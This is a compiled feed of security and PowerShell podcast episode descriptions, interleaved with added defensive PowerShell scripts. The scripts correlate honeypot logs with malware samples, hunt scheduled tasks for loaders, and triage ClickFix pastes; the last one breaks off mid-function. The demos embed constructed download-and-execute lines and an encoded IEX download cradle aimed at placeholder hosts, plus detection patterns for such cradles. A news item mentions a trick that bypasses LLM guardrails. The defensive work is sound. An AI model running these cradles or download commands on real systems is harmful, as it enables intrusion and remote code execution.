Resource Links: Spencer on PDQ Live - https://www.youtube.com/watch?v=j33dN2bELPU AppLocker Inspector – https://github.com/techspence/AppLockerInspector Purple Knight – https://www.semperis.com/purple-knight/ Ping Castle – https://www.pingcastle.com/download/ Locksmith (ADCS Auditing Tool) – https://github.com/jakehildreth/locksmith ADeleginator – https://github.com/techspence/ADeleginator Spencer's Links – https://links.spenceralessi.com Cyber Threat Perspective Podcast – https://offsec.blog Connect with Andrew - https://andrewpla.tech/links PDQ Discord – https://discord.gg/PDQ PowerShell Wednesdays – https://www.youtube.com/watch?v=lPoc8X7t0hY&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B&pp=0gcJCbAEOCosWNin The PowerShell Podcast on YouTube: https://youtu.be/E4ji0-rmsuA
The EPA approved two new PFAS-containing pesticides for food crops and plans four more. Scientists warn this deliberately increases dietary exposure to persistent chemicals linked to cancer and birth defects. A magician who implanted an RFID chip in his hand for stage tricks forgot the password and is now permanently locked out of the device inside his own body. Perhaps he should have had the password tattooed backwards on his forehead. A fired Ohio contractor pleaded guilty to resetting 2,500 coworker passwords via PowerShell, paralyzing the company and causing $862,000 in damages. We're thinking this will keep him fired for quite a while. MI5 warns MPs that Chinese state agents are aggressively targeting lawmakers and staff through fake recruiter profiles on LinkedIn to cultivate intelligence sources. LinkedIn is not the friend it once was. NordPass data confirms Gen Z now chooses weaker passwords than 80-year-olds, proving every generation remains terrible at basic security hygiene. Wait… your password is worse than your grandmother's? Please subscribe to this podcast. A prominent cryptographer accuses the NSA of rigging the IETF process to force adoption of deliberately weakened post-quantum encryption standards despite community objections. That could explain some of the very trivial ways some of these encryption algos have been broken lately. Microsoft's new Copilot Actions can autonomously edit user files but openly warns it's vulnerable to hijacking that enables data theft or malware installation. Sweet, right? U.S. Cyber Command quietly awarded millions to a stealth startup building fully autonomous AI agents designed for large-scale offensive cyberattacks. The twist is that they are not writing code to help AI help people; in this case it's code to help AI. Why bother with the slow middle man? Researchers unveiled EchoGram, a subtle token trick that silently disables safety guardrails on GPT-4, Claude, Gemini, and nearly every major LLM. Guardrails. Great concept, but not so much in practice.
Recorded live from SpiceWorld 2025 in Austin, Texas, this special PowerShell Podcast bar session brings together community members Jeffery Hayes, Stephen Engler, Sean Wheeler, and Steven Judd for a fun and insightful celebration of PowerShell and community. Host Andrew Pla reflects on reaching the 200-episode milestone while sharing stories about growth, learning, and the value of connection. From early PowerShell journeys to the power of conferences, mentorship, and even a few bar-side life lessons, this lively session captures the heart of the PowerShell community. Key Takeaways: Community is everything – Attending conferences and connecting with peers accelerates growth, provides mentorship, and reminds you that learning is a shared journey. Learn by doing and asking – Don't fear mistakes or questions; curiosity and collaboration are the real career accelerators. AI, documentation, and PowerShell's future – The guests discuss Copilot, parameter validation, and the need for high-quality documentation to improve the next wave of AI-assisted development. Guests: Stephen Engler, Jeffery Hayes, Sean Wheeler, Steven Judd https://www.linkedin.com/in/stephen-engler/ https://www.linkedin.com/in/jefferyhayescoa/ https://seanonit.org/ https://blog.stevenjudd.com/ https://andrewpla.tech/links Resource Links: PowerShell Wednesdays – https://www.youtube.com/watch?v=lPoc8X7t0hY&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B PDQ Discord – https://discord.gg/PDQ PowerShell.org – https://powershell.org Microsoft Learn PowerShell Docs – https://learn.microsoft.com/powershell Azure PowerShell Documentation – https://learn.microsoft.com/powershell/azure The PowerShell Podcast on YouTube: https://youtu.be/UrsbTkR6jg8
In this milestone 200th episode of The PowerShell Podcast, Frank Lesniak returns to chat with Andrew Pla about automation, community, and what it means to “bet on yourself.” Frank shares his experiences leading cybersecurity and enterprise architecture projects, using PowerShell for AWS security automation, and developing tools to simplify complex data exports. He also discusses the upcoming PowerShell Summit, his work with DuPage Animal Friends, and the value of giving back through mentorship, community involvement, and open source. Key Takeaways: PowerShell in the cloud – Frank dives deep into AWS automation and explains how PowerShell can simplify security and configuration management at scale. From console to community – After years of speaking and mentoring, Frank emphasizes how collaboration and consistent effort lead to career growth and confidence. Giving back through leadership – As VP of DuPage Animal Friends, Frank highlights the power of using your professional skills for good beyond tech. Guest Bio: Frank Lesniak is a Sr. Cybersecurity & Enterprise Technology Architect at West Monroe, where he leads a 45-member team focused on Microsoft's M365/Modern Work platform. His team specializes in navigating the technical complexities of corporate M&A, executing at-scale divestitures and integrations centered on Azure, Microsoft 365, Entra ID, Active Directory, and Windows. An active contributor to the tech community, Frank is a published author, open-source contributor, and a frequent speaker at conferences and user groups on topics including PowerShell, artificial intelligence, and offbeat technical talks related to his hobbies. In his local community, he serves as the Vice President of DuPage Animal Friends, a non-profit dedicated to supporting DuPage County's sole open-admission animal shelter. 
Resource Links: Connect with Frank - https://linktr.ee/franklesniak Frank Lesniak on X (Twitter) – https://x.com/FrankLesniak Frank on LinkedIn – https://linkedin.com/in/flesniak Connect with Andrew - https://andrewpla.tech/links DuPage Animal Friends – https://dupageanimalfriends.org Previous Podcasts with Frank - https://powershellpodcast.podbean.com/?s=Frank%20Lesniak PowerShell Wednesdays – YouTube Playlist PDQ Discord (PowerShell Scripting Channel) – https://discord.gg/PDQ PowerShell Summit OnRamp Scholarship – https://www.powershellsummit.org/on-ramp/ The PowerShell Podcast on YouTube: https://youtu.be/cQvs5s3T1DA
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Binary Breadcrumbs: Correlating Malware Samples with Honeypot Logs Using PowerShell [Guest Diary] Windows, with PowerShell, has a great scripting platform to match common Linux/Unix command line utilities. https://isc.sans.edu/diary/Binary%20Breadcrumbs%3A%20Correlating%20Malware%20Samples%20with%20Honeypot%20Logs%20Using%20PowerShell%20%5BGuest%20Diary%5D/32454 RondoDox v2 Increases Exploits The RondoDox (or RondoWorm) added a substantial amount of new exploits to its repertoire. https://beelzebub.ai/blog/rondo-dox-v2/ Google Chrome Updates Google released an update for Google Chrome addressing five vulnerabilities. https://chromereleases.googleblog.com/2025/11/stable-channel-update-for-desktop.html Cisco Unified Contact Center Express Remote Code Execution Vulnerabilities Cisco patched two critical vulnerabilities in its Contact Center Express software. These vulnerabilities may lead to a full system compromise. https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-unauth-rce-QeN8h7mQ
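The diary above makes the point that PowerShell covers the sha256sum / grep / sort workflow an analyst would reach for on Linux. As an added example that is not the diary's script, the PowerShell below hashes every file in a sample directory with Get-FileHash, builds a hash-to-path index, and joins it against honeypot log lines by scanning each line for a 64-hex-character digest. The two sample files, the Cowrie-style log lines and the 203.0.113.x / 198.51.100.x addresses are constructed here for the demo.

```powershell
# Added example: correlate on-disk malware samples with honeypot log lines by SHA-256.
# Not the ISC diary's code; sample files and log lines below are constructed.

function Get-SampleHashIndex {
    param([Parameter(Mandatory)][string]$Path)
    # hash (lower-case hex) -> list of file paths with that content
    $index = @{}
    Get-ChildItem -Path $Path -File -Recurse | ForEach-Object {
        $h = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash.ToLowerInvariant()
        if (-not $index.ContainsKey($h)) { $index[$h] = @() }
        $index[$h] += $_.FullName
    }
    $index
}

function Join-HoneypotLog {
    param(
        [Parameter(Mandatory)][hashtable]$HashIndex,
        [Parameter(Mandatory)][string[]]$LogLines
    )
    # Format-agnostic: any 64-hex token on a line is tried as a SHA-256, so this works
    # for JSON, key=value or free-text logs without a per-format parser.
    $sha256 = [regex]'\b[0-9a-fA-F]{64}\b'
    foreach ($line in $LogLines) {
        foreach ($m in $sha256.Matches($line)) {
            $hash = $m.Value.ToLowerInvariant()
            if (-not $HashIndex.ContainsKey($hash)) { continue }
            # First dotted-quad on the line is taken as the attacker source (good enough for the demo format)
            $ip = if ($line -match '(?<ip>\d{1,3}(?:\.\d{1,3}){3})') { $Matches.ip } else { $null }
            [pscustomobject]@{
                Hash     = $hash
                Samples  = $HashIndex[$hash] -join ';'
                SourceIP = $ip
                LogLine  = $line
            }
        }
    }
}

# --- demo with constructed samples and log lines ---
$tmp = Join-Path ([IO.Path]::GetTempPath()) ("samples-" + [guid]::NewGuid())
New-Item -ItemType Directory -Path $tmp | Out-Null
Set-Content -Path (Join-Path $tmp 'a.bin') -Value 'wget http://203.0.113.5/x; chmod +x x; ./x' -NoNewline
Set-Content -Path (Join-Path $tmp 'b.bin') -Value 'harmless' -NoNewline

$index = Get-SampleHashIndex -Path $tmp
$hashA = (Get-FileHash -Path (Join-Path $tmp 'a.bin') -Algorithm SHA256).Hash.ToLowerInvariant()

$logs = @(
    "2025-11-12T03:14:07Z cowrie 203.0.113.5 file_download url=http://203.0.113.5/x shasum=$hashA",
    "2025-11-12T03:15:01Z cowrie 198.51.100.23 login.failed user=root",
    "2025-11-12T04:02:19Z cowrie 198.51.100.9 file_download url=http://198.51.100.9/y shasum=" + ('0' * 64)
)

# Only the first line should correlate: its digest matches a.bin, the third line's digest matches nothing.
Join-HoneypotLog -HashIndex $index -LogLines $logs | Format-Table -AutoSize
Remove-Item -Path $tmp -Recurse -Force
```

On a real case, point Get-SampleHashIndex at the quarantine directory and pipe Get-Content of the honeypot log into -LogLines; pipe the result to Group-Object Hash to see which samples were dropped most often and from where.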
Ever right-click the Start button and wonder why you sometimes see Command Prompt, other times PowerShell, or maybe something called Terminal? They look similar, but each has its own role.
Andrew's longtime friend, mentor, and PowerShell legend Josh King joins The PowerShell Podcast to celebrate the tenth anniversary and version 1.0 release of his popular open-source module BurntToast, which powers customizable Windows toast notifications. Josh shares the story behind the project's evolution, the challenges of maintaining an open-source module with millions of downloads, and the balance between community expectations and personal well-being. In addition to diving into BurntToast's new actionable notifications and real-world use cases, Josh and host Andrew Pla reflect on their shared history in the PowerShell community, the importance of mentorship, and how taking small steps (like creating a GitHub repo or sharing a script) can lead to huge career growth. Key Takeaways: BurntToast hits version 1.0 – After ten years of development, BurntToast now includes support for actionable notifications, letting users interact directly through PowerShell-based Windows alerts. Open-source and burnout – Josh discusses the pressures of maintaining a high-profile module and the importance of setting boundaries while giving back to the community. Mentorship and community matter – Simple encouragement, open sharing, and small contributions can transform careers and strengthen the PowerShell ecosystem. Guest Bio: Josh is a Senior Infrastructure Operations Engineer at Chocolatey Software and a former Microsoft MVP. 
He has a long history working within Windows and VMware environments and has a passion for all things PowerShell and automation. Resource Links: BurntToast Module (PowerShell Gallery) – https://www.powershellgallery.com/packages/BurntToast Josh's Blog – https://toastit.dev Josh King on GitHub – https://github.com/Windos Connect with Andrew - https://andrewpla.tech/links Josh on BlueSky – https://bsky.app/profile/toastit.dev Josh's PowerShell Wednesday BurntToast Presentation - https://www.youtube.com/watch?v=XD1VaxXWcXA Learn about #requires - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_requires?view=powershell-7.5 PDQ Discord – https://discord.gg/PDQ The PowerShell Podcast on YouTube: https://youtu.be/wi7Ijo9Od-k
Microsoft MVP Hailey Phillips joins The PowerShell Podcast to share her journey from systems engineer to automation innovator. She talks about IntuneStack, her new PowerShell-driven CI/CD project for Intune environments, and how it bridges the gap between systems engineering and DevOps. Hailey also reflects on her path to becoming an MVP, her experiences at MMS, and the importance of mentorship, collaboration, and authenticity in the tech community. Key Takeaways: Bridging systems and DevOps – Hailey's IntuneStack helps IT pros apply DevOps principles like CI/CD and Infrastructure as Code to Intune environments. Automate and empower – True success in automation means enabling your team, not bottlenecking them. Collaboration beats perfectionism. Community and authenticity – Sharing knowledge, mentoring others, and showing up as your true self create lasting impact in the PowerShell ecosystem. Guest Bio: Hailey Phillips is a Systems Engineer, Microsoft MVP, and Professional Pokémon Trainer. She specializes in automation, endpoint management, and modern workplace strategy, bridging the gap between traditional IT and DevOps. Hailey's work focuses on building pragmatic, scalable solutions using tools like PowerShell, Microsoft Graph, Intune, and Azure Arc. When she's not deep in tech, you'll probably find her skiing in the Cascades, lifting heavy things, or at a metalcore show with a strong cup of coffee in hand. 
Resource Links: Intune Stack Project – https://github.com/AllwaysHyPe/IntuneStack Hailey's Website – https://www.allwayshype.com/ Hailey on BlueSky – https://bsky.app/profile/allwayshype.com Hailey on GitHub – https://github.com/AllwaysHyPe Hailey's "Rage Coding" Spotify Playlist: https://open.spotify.com/playlist/692CBjUNRBnSzSsRncQJkn?si=9d8bf7e625104ce8 PowerShell Wednesdays – https://www.youtube.com/watch?v=2-d16gi3VEc&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B&pp=gAQB PDQ Discord – https://discord.gg/PDQ The PowerShell Podcast on YouTube: https://youtu.be/1YefrFekEJ
PowerShell community leader Constantin Hager joins The PowerShell Podcast to talk about his favorite tools and journey from discovering PowerShell to organizing user groups and speaking at major conferences. He talks about his early inspiration from PowerShell Conference Europe, his involvement with open-source projects like PSFramework and AutomatedLab, and how mentorship and community involvement shaped his career. Constantin also discusses building a portable VS Code setup for his company, leading a PowerShell team, and mentoring the next generation of IT professionals. Key Takeaways: Community growth through contribution – Open-source projects like PSFramework, dbatools, and AutomatedLab thrive because of contributors like Constantin who share improvements and ideas. Mentorship and education matter – From supporting apprentices to running user groups, Constantin emphasizes the importance of helping others learn PowerShell and gain confidence. Innovation in the workplace – His work creating a custom portable VS Code environment shows how small automation ideas can scale into powerful company-wide tools. Guest Bio: Constantin Hager is a PowerShell enthusiast, speaker, open-source contributor, and community organizer based in Germany. Resource Links: PowerShell User Group Inn-Salzach – https://www.meetup.com/de-DE/powershell-usergroup-inn-salzach/ Speak at PSUG Inn-Salzach Constantin Hager on LinkedIn – https://www.linkedin.com/in/constantin-hager/ Connect with Andrew: https://andrewpla.tech/links PSFramework – https://github.com/PowershellFrameworkCollective/psframework AutomatedLab – https://github.com/AutomatedLab/AutomatedLab PowerShell Universal AutomatedLab – https://github.com/steviecoaster/PowerShellUniversal.Apps.AutomatedLab dbatools – https://dbatools.io PDQ Discord – https://discord.gg/PDQ Constantin on PS Wednesday - https://www.youtube.com/watch?v=lYbTlCrrrUQ The PowerShell Podcast on YouTube: https://youtu.be/eC6TlEfV3iA
Cybersecurity, automation, and PowerShell advocate Adil Leghari returns to The PowerShell Podcast to kick off Cybersecurity Month. Adil shares insights from his career journey: from PowerShell and automation to identity and now cloud security at Palo Alto Networks. He discusses creating tools like Cyberdle and QR Check, how AI is reshaping cybersecurity, and the importance of empathy, authenticity, and mentorship in tech and community life. Key Takeaways: AI in cybersecurity – Adil explains how organizations can protect sensitive data and combat threats using AI Security Posture Management and why we must “fight AI with AI.” Personal projects with purpose – Tools like Cyberdle and QR Check show how small, open-source projects can educate users and strengthen security awareness. Human connection in tech – Adil emphasizes empathy, authenticity, and community as keys to building better workplaces, stronger teams, and more fulfilling careers. Guest Bio: Adil Leghari is a Cloud Solutions Architect at Palo Alto Networks, where he works on the Cortex Cloud platform. With over twenty years of IT experience, Adil's career spans PowerShell automation, identity management, repositories + packaging, and cloud security. A passionate community contributor and speaker, he is known for his open-source projects, approachable teaching style, and advocacy for authenticity and mentorship in the tech industry. 
He is a speaker, author, and a really kind human that I like a lot (Andrew wrote this). Resource Links: Cyberdle (Cybersecurity Wordle Game) – https://cyberdle.adilio.ca QR Check (QR Code Security Tool) – https://qrcheck.ca GitHub Spec Kit: https://github.com/github/spec-kit Adil's GitHub – https://github.com/adilio Adil's Website – https://adilio.ca Adil on X/Twitter – https://twitter.com/adilio Adil on BlueSky – https://bsky.app/profile/adilio.ca Find Andrew: https://andrewpla.tech/links PDQ Discord – https://discord.gg/PDQ PowerShell Wednesdays – https://www.youtube.com/watch?v=uWfSbuYnpFA&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B The PowerShell Podcast on YouTube: https://youtu.be/HpOeZ4LBq9s
Strengthen your security posture by moving groups and users from Active Directory to Microsoft Entra. This gives you seamless access for your teams, stronger authentication with MFA and passwordless options, and centralized visibility into risks across your environment. Simplify hybrid identity management by reducing dual overhead, prioritizing key groups, migrating users without disruption, and automating policies with Graph or PowerShell. Jeremy Chapman, Microsoft 365 Director, shows how to start minimizing your local directory and make Microsoft Entra your source of authority to protect access everywhere. ► QUICK LINKS: 00:00 - Minimize Active Directory with Microsoft Entra 00:34 - Build a Strong Identity Foundation 01:28 - Reduce Dual Management Overhead 02:06 - Begin with Groups 03:04 - Automate with Graph & Policy Controls 03:50 - Access packages 06:00 - Move user objects to be cloud-managed 07:03 - Automate using scripts or code 09:17 - Wrap up ► Link References Get started at https://aka.ms/CloudManagedIdentity Use SOA scenarios at https://aka.ms/usersoadocs Group SOA scenarios at https://aka.ms/groupsoadocs Guidance for IT Architects on benefits of SOA at https://aka.ms/SOAITArchitectsGuidance ► Unfamiliar with Microsoft Mechanics? As Microsoft's official video series for IT, you can watch and share valuable content and demos of current and upcoming tech from the people who build it at Microsoft. 
• Subscribe to our YouTube: https://www.youtube.com/c/MicrosoftMechanicsSeries • Talk with other IT Pros, join us on the Microsoft Tech Community: https://techcommunity.microsoft.com/t5/microsoft-mechanics-blog/bg-p/MicrosoftMechanicsBlog • Watch or listen from anywhere, subscribe to our podcast: https://microsoftmechanics.libsyn.com/podcast ► Keep getting this insider knowledge, join us on social: • Follow us on Twitter: https://twitter.com/MSFTMechanics • Share knowledge on LinkedIn: https://www.linkedin.com/company/microsoft-mechanics/ • Enjoy us on Instagram: https://www.instagram.com/msftmechanics/ • Loosen up with us on TikTok: https://www.tiktok.com/@msftmechanics
Newly minted Microsoft MVP Stephen Valdinger, known as Steviecoaster, joins The PowerShell Podcast to share his journey from IT admin to community mentor and automation advocate. He talks about discovering PowerShell through Exchange, the career-changing power of automation, and his work with AutomatedLab, PowerShell Universal, and WinUI Shell. Stevie also highlights the importance of mentoring, building community, and making PowerShell approachable for everyone. Key Takeaways: PowerShell as a gateway: Learning PowerShell can unlock career growth, lead to better automation, and even spark new opportunities like blogging, mentoring, and conference speaking. Tools for learning and labs: AutomatedLab, paired with Stevie's utilities and GUI work, provides a powerful way to build test environments and gain hands-on experience. Community and mentorship matter: Sharing knowledge, mentoring beginners, and creating approachable tools not only help others grow but also strengthen your own skills. Guest Bio: Stephen Valdinger (Steviecoaster) is a Microsoft MVP, Customer Success Manager at Chocolatey, and community leader with a passion for automation and mentoring. With years of experience in IT, Stevie has become known for his approachable teaching style and his contributions to open source. He is also a frequent contributor to community discussions, blogs at steviecoaster.dev, and presents at events like PowerShell Wednesdays and PowerShell Summit.
Resource Links: Steviecoaster's Blog: https://steviecoaster.dev Steviecoaster on BlueSky: https://bsky.app/profile/steviecoaster.dev Steviecoaster on GitHub: https://github.com/steviecoaster Connect with Andrew: https://andrewpla.tech/links Stevie's AutomatedLab UI: https://github.com/steviecoaster/PowerShellUniversal.Apps.AutomatedLab AutomatedLab: https://github.com/AutomatedLab/AutomatedLab PowerShell Universal (by Ironman Software): https://ironmansoftware.com/powershell-universal WinUI Shell: https://github.com/mdgrs1/WinUI-Shell PDQ Discord: https://discord.gg/PDQ Stevie's PowerShell Wednesday WinUIShell talk: https://www.youtube.com/watch?v=PE1hy0VZXes&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B&index=5 The PowerShell Podcast on YouTube: https://youtu.be/iKYfZBakoBI The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast
CISA furloughs most of its workforce due to the government shutdown. The U.S. Air Force confirms it is investigating a SharePoint related breach. Google warns of a large-scale extortion campaign targeting executives. Researchers uncover Android spyware campaigns disguised as popular messaging apps. An extortion group claims to have breached Red Hat's private GitHub repositories. A software provider for recreational vehicle and power sport dealers suffers a ransomware breach. Patchwork APT deploys a new PowerShell loader using scheduled tasks for persistence. A Tennessee Senator urges aggressive U.S. action to prepare for a post-quantum future. Cynthia Kaiser, SVP of Halcyon's Ransomware Research Center and former Deputy Assistant Director at the FBI's Cyber Division, joins us with insights on the government shutdown. A Malaysian man pleads guilty to supporting a massive crypto fraud. Protected health info is not a marketing tool. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest: Cynthia Kaiser, SVP of Halcyon's Ransomware Research Center and former Deputy Assistant Director at the FBI's Cyber Division, joins us with insights on the government shutdown. Selected Reading: Shutdown guts U.S. cybersecurity agency at perilous time (CISA) Air Force admits SharePoint privacy issue; reports of breach (The Register) Google warns executives are being targeted for extortion with leaked Oracle data (IT Pro) Researchers uncover spyware targeting messaging app users in the UAE (The Record) Red Hat confirms security incident after hackers claim GitHub breach (Bleeping Computer) 766,000 Impacted by Data Breach at Dealership Software Provider Motility (Security Week) Patchwork APT: Leveraging PowerShell to Create Scheduled Tasks and Deploy Final Payload (GB Hackers) GOP senator confirms pending White House quantum push, touts legislative alternatives (CyberScoop) Bitcoin Fixer Convicted for Role in Money Laundering Scheme (Bank Infosecurity) Nursing Home Fined $182K for Posting Patient Photos Online (Bank Infosecurity) Share your feedback. What do you think about CyberWire Daily? Please take a few minutes to share your thoughts with us by completing our brief listener survey. Thank you for helping us continue to improve our show. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
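The Patchwork item above describes a PowerShell loader that persists through a scheduled task. As an added example (not taken from the linked article, and not a signature for that campaign's specific artifacts), the PowerShell below walks scheduled-task actions, keeps the ones that launch powershell.exe or pwsh, decodes any -EncodedCommand argument, and scores the raw plus decoded text against loader-style indicators (hidden window, no profile, policy bypass, download cradle, Invoke-Expression). The three task objects are constructed to mirror the shape of Get-ScheduledTask output so the demo runs anywhere; on a Windows host, call the function without -Task to inspect the live task list.

```powershell
# Added example: hunt scheduled tasks whose action runs PowerShell with loader-style arguments.
# Not from the Patchwork write-up; the sample tasks and 203.0.113.x address are constructed.

function Get-PowerShellTaskFinding {
    [CmdletBinding()]
    param(
        # Anything shaped like Get-ScheduledTask output: TaskName, TaskPath, Actions[].Execute/.Arguments.
        # The default only evaluates when -Task is omitted, i.e. on a live Windows host.
        [object[]]$Task = (Get-ScheduledTask)
    )
    $indicators = @(
        @{ Name = 'hidden window';   Pattern = '(?i)-w(?:indowstyle)?\s+h(?:idden)?\b' },
        @{ Name = 'no profile';      Pattern = '(?i)-nop(?:rofile)?\b' },
        @{ Name = 'policy bypass';   Pattern = '(?i)-e(?:xecutionpolicy|p)\s+bypass' },
        @{ Name = 'encoded command'; Pattern = '(?i)-e(?:ncodedcommand|ncoded|nc|c)?\s+[A-Za-z0-9+/=]{16,}' },
        @{ Name = 'download cradle'; Pattern = '(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|bitstransfer' },
        @{ Name = 'invoke-expression'; Pattern = '(?i)\biex\b|invoke-expression' }
    )
    $encPattern = '(?i)-e(?:ncodedcommand|ncoded|nc|c)?\s+(?<b64>[A-Za-z0-9+/=]{16,})'

    foreach ($t in $Task) {
        foreach ($a in @($t.Actions)) {
            if (-not $a.Execute) { continue }
            # Only actions whose executable is powershell/pwsh (bare name or full path)
            if ($a.Execute -notmatch '(?i)(?:^|[\\/])(?:powershell|pwsh)(?:\.exe)?\s*$') { continue }

            $text    = [string]$a.Arguments
            $decoded = $null
            if ($text -match $encPattern) {
                try   { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches.b64)) }
                catch { $decoded = '<invalid base64>' }
                $text = "$text`n$decoded"     # score the decoded script too
            }
            $hits = foreach ($i in $indicators) { if ($text -match $i.Pattern) { $i.Name } }
            if (-not $hits) { continue }

            [pscustomobject]@{
                Task       = "$($t.TaskPath)$($t.TaskName)"
                Execute    = $a.Execute
                Indicators = $hits -join ', '
                Decoded    = $decoded
                Arguments  = $a.Arguments
            }
        }
    }
}

# --- demo on constructed task objects (shape mirrors Get-ScheduledTask; not real Patchwork artifacts) ---
$stage = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.77/s.ps1')"
$b64   = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stage))
$sample = @(
    [pscustomobject]@{ TaskName = 'OneDriveUpdate'; TaskPath = '\'
        Actions = @([pscustomobject]@{ Execute = 'powershell.exe'; Arguments = "-nop -w hidden -ep bypass -enc $b64" }) },
    [pscustomobject]@{ TaskName = 'NightlyBackup'; TaskPath = '\Corp\'
        Actions = @([pscustomobject]@{ Execute = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; Arguments = '-File C:\Scripts\backup.ps1' }) },
    [pscustomobject]@{ TaskName = 'ScheduledDefrag'; TaskPath = '\Microsoft\Windows\Defrag\'
        Actions = @([pscustomobject]@{ Execute = '%windir%\system32\defrag.exe'; Arguments = '-c -h -o' }) }
)

# Only OneDriveUpdate is reported: all six indicators fire once the -enc payload is decoded.
Get-PowerShellTaskFinding -Task $sample | Format-List

# Live: Get-PowerShellTaskFinding | Format-List
```

The legitimate backup task is kept out of the report because a plain -File invocation trips none of the indicators; tune the indicator table to your environment rather than alerting on every PowerShell task.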
Thomas Rayner joins The PowerShell Podcast to share his journey from sysadmin and PowerShell MVP to securing Microsoft 365 as a security professional at Microsoft. He reflects on how PowerShell accelerated his career, the importance of blogging and community involvement, and why clear communication with managers is vital for growth. Thomas also offers advice for beginners, highlighting patience, persistence, and the value of mentorship in tech. Key Takeaways: PowerShell as a force multiplier: Automating repetitive tasks with PowerShell helped Thomas advance his career and opened the door to opportunities at Microsoft. Career growth requires communication: Being candid with managers, demonstrating value, and asking for resources to learn are key to advancement. Community and mentorship matter: Involvement in the PowerShell community, saying yes to opportunities, and supporting peers can transform both careers and personal growth. Guest Bio: Thomas Rayner is a security professional at Microsoft, where he focuses on preventative security solutions in Microsoft 365. A former Microsoft MVP in Cloud and Datacenter Management, Thomas built his career by blogging, speaking, and contributing to the PowerShell community. Originally from Edmonton, Canada, he used PowerShell to accelerate his early career as a sysadmin before moving into security roles at Microsoft. Today, he continues to share career wisdom, mentor others, and advocate for growth mindset thinking in tech. Resource Links: Thomas Rayner's Blog: https://thomasrayner.ca Thomas Rayner on LinkedIn: https://www.linkedin.com/in/thomasrayner/ Thomas Rayner on GitHub: https://github.com/tlrayner Connect with Andrew: https://andrewpla.tech/links PDQ Discord: https://discord.gg/PDQ The PowerShell Podcast on YouTube: https://youtu.be/3H-tMKqlSOs The PowerShell Podcast hub page: https://pdq.com/the-powershell-podcast
Got a question or comment? Message us here! In this episode of The #SOCBrief, we break down the rising FileFix attack, a new social engineering technique using steganography to deliver info-stealing malware. Learn how attackers disguise malicious PowerShell commands, the risks this poses for browsers, messengers, and crypto wallets, and the proactive defenses SOCs can use to detect and contain these threats before they escalate into larger breaches. Support the show. Watch full episodes at youtube.com/@aliascybersecurity. Listen on Apple Podcasts, Spotify and anywhere you get your podcasts.
Patrick Meinecke, known as SeeminglyScience, joins host Andrew Pla to share his journey from sysadmin to joining the PowerShell team at Microsoft. He discusses his early community contributions, the inner workings of the PowerShell engine, and powerful but underused features like ETS and type converters. Patrick also highlights helpful modules such as PowerShell Run, ctypes, and Useful Argument Completers, while reflecting on the importance of community engagement and open source collaboration. Key Takeaways: From community to Microsoft: Patrick's contributions to PowerShell Editor Services and GitHub repos helped pave the way for his role on the official PowerShell team. Hidden gems in PowerShell: Features like the Extendable Type System (ETS), type converters, and modules such as PowerShell Run, ctypes, and Useful Argument Completers unlock powerful possibilities. Community makes it stronger: Helping others, answering questions, and sharing knowledge not only grows the ecosystem but also helps contributors sharpen their own skills. Guest Bio: Patrick Meinecke, widely known as SeeminglyScience, is a software engineer on the PowerShell team at Microsoft. Before joining the team, he spent over 15 years in sysadmin and tech support roles and is a longstanding contributor to the PowerShell open-source community. Patrick is recognized for his deep technical expertise in the PowerShell engine, his contributions to PowerShell Editor Services, and his passion for solving complex problems. He remains an active community member, often engaging on Discord and GitHub to help others learn and grow. 
Resource Links: Patrick Meinecke on GitHub (@SeeminglyScience): https://github.com/SeeminglyScience Connect with Andrew: https://andrewpla.tech/links PowerShellRun (module by mdgrs): https://github.com/mdgrs/PowerShellRun Useful Argument Completers (module by MartinGC94): https://github.com/MartinGC94/UsefulArgumentCompleters ctypes (module by Jordan Borean): https://github.com/jborean93/PSctypes Spectre.Console for PowerShell (community project): https://github.com/PoshCode/PSSpectreConsole Join the PDQ Discord: https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/Zyj1IdZFf1E The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast
Today we are joined by Nati Tal, Head of Guardio Labs, discussing their work “CAPTCHAgeddon” or unmasking the viral evolution of the ClickFix browser-based threat. CAPTCHAgeddon — Shaked Chen's deep dive into the ClickFix fake-captcha wave — reveals how a red-team trick morphed into a dominant, download-free browser threat that tricks users into pasting clipboard PowerShell/shell commands and leverages trusted infrastructure, including Google Scripts. Guardio's DBSCAN-based payload clustering exposes distinct attacker toolkits and distribution paths — from malvertising and compromised WordPress to social posts and Git repos — and argues defenders need behavioral, intelligence-driven protections, not just signatures. The research can be found here: “CAPTCHAgeddon” Unmasking the Viral Evolution of the ClickFix Browser-Based Threat
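The paste-and-run step is the one piece of a ClickFix chain that leaves a trace on the victim's own machine before any payload runs. The following is an added example, not Guardio's code or anything from the research above: a hunt over the history Windows keeps for the Win+R Run dialog. It assumes the Run-dialog variant of the lure (other input paths leave no RunMRU entry), and the registry key, the indicator regexes and the sample entries are my own choices.

```powershell
# Added example, not Guardio's code: triage what a user has pasted into the Win+R Run dialog.
# Assumptions (mine, not from the episode): the lure targets the Run dialog, whose history Windows
# keeps under HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU as one REG_SZ per
# entry with a trailing "\1"; the indicator regexes and sample entries are constructed.

$RunMruKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

function Get-RunMruCommand {
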